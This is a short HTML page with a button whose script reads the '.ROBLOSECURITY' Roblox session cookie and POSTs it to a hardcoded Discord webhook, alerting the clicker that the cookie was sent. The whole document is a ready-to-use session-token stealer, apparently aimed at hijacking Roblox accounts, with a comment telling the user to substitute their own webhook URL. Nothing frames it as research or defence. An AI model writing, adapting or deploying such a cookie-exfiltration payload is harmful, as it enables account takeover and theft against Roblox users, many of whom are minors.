<button>Click Me</button>
<script>
    button.addEventListener('click', function() {
        let cookieValue = document.cookie.split('; ').find(row => row.startsWith('.ROBLOSECURITY')).split('=')[1];

        // Replace this URL with your webhook URL
        let webhookUrl = 'https://discord.com/api/webhooks/1273972378388402288/qNRa6r3T0ToLe6aF969_5vef8vGNNPW_hlCiG3wr2n1PlqLDRhS4EMss13mCRNXKPsL_';

        // Sending the cookie value to the webhook
        fetch(webhookUrl, {
            method: 'POST',
            headers: {
                'Content-Type': 'application/json',
            },
            body: JSON.stringify({cookie: cookieValue}),
        }).then(response => {
            if (response.ok) {
                alert('Cookie sent successfully');
            } else {
                alert('Failed to send cookie');
            }
        }).catch(error => {
            alert('Error: ' + error);
        });
    });
</script>
